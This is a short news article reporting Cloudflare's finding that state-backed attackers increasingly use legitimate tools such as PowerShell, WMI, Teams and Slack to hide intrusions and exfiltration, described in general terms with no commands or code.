Cloudflare Reports Surge in Living-off-the-Land Cyberattacks Using Legitimate Enterprise Software

Cloudflare alerts enterprises to a surge in LotL cyberattacks, where hackers use legitimate system tools and cloud apps to hide their malicious activities.

By: AXL Media

Published: Feb 25, 2026, 5:26 AM EST

Source: The information in this article was sourced from ITPro

Stealth Tactics Bypass Traditional Security Perimeters

Cybersecurity firm Cloudflare has observed a significant evolution in the methods used by sophisticated, state-sponsored threat actors to infiltrate corporate networks. Rather than deploying custom malware that might trigger antivirus signatures, these hackers are increasingly utilizing "Living-off-the-Land" techniques. This involves using legitimate system tools, such as PowerShell, Windows Management Instrumentation, and administrative scripts, to move through a network. According to Cloudflare, this approach makes it nearly impossible for traditional security solutions to distinguish between a malicious command and a routine task performed by a system administrator.

Weaponizing the Enterprise Ecosystem

The modern enterprise environment, filled with integrated cloud services and productivity suites, has inadvertently provided a massive toolkit for attackers. Cloudflare’s analysis suggests that hackers are leveraging trusted applications like Microsoft Teams, Slack, and common cloud storage platforms to exfiltrate data and communicate with command-and-control servers. By operating within the "enterprise ecosystem," attackers can bypass strict firewall rules that would otherwise block traffic to unknown or suspicious domains. According to security researchers, this strategy effectively turns a company's internal infrastructure against itself.

Surge in State-Backed Espionage Campaigns

The rise in LotL attacks is primarily attributed to well-resourced, state-backed hacking groups seeking long-term persistence in critical infrastructure and government sectors. These actors prioritize "low and slow" operations, where the goal is to remain embedded in the network for months or even years without being detected. According to Cloudflare, the lack of a "malicious file" to scan means that even advanced Endpoint Detection and Response systems can be circumvented if they are not specifically configured to monitor for the anomalous use of authorized administrative tools.